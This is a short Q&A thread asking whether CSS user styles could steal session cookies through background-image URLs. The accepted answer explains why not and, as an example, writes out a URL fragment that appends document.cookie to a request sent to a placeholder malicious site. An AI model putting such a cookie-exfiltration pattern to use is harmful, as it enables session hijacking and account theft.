# Can user style css steal cookies?

Tags: html, css, cookies

I am fond of Stylus browser add-on that enables CSS style packages to install at the will of the user.

I've watched this awesome video about cookie stealing (by Mike Pound|Computerphile): https://www.youtube.com/watch?v=T1QEs3mdJoc

CSS can set background images of elements that otherwise would not have one (I've written one that gets rid of a background image where there is one, which is the reverse).

Watching the video, Dr. Pound uses an image (via unescaped HTML) URL that really executes PHP which wants the session cookie and also returns the image data.
At 11:19 He says that the deal is trying to trick the browser into sending the cookie.

My question: Can a user style (really dynamically loaded CSS rules) be a vector for stealing session cookies by setting the `background` of any element and supplying an URL with PHP session stealing code?

If no, why not? (I imagine it has something to do with Content Security Policy?)

If so, can it be combated without shutting down add-ons that do dynamic CSS injection?

-- I'll be attempting some tests of my own soon and thought the community would like to chew on it at least as a theoretical.

Feel free to downvote if I'm asking a stupid question, the button is over there.

Answer (score 1, accepted):

I expect that the request to get the background image will have its own session (and possible cookies) with the server it's on. So no cookie stealing there.

You could, I believe, use javascript to send the cookie as request variables to the image's server (e.g. setting the url to something like `'http://some-malicious-site/image.php?cookie=' + document.cookie` something). However, I don't see how CSS could execute javascript to prepare such a URL to do that. Stylus browser add-on might be able to do that, but could be blocked due to origin security policies.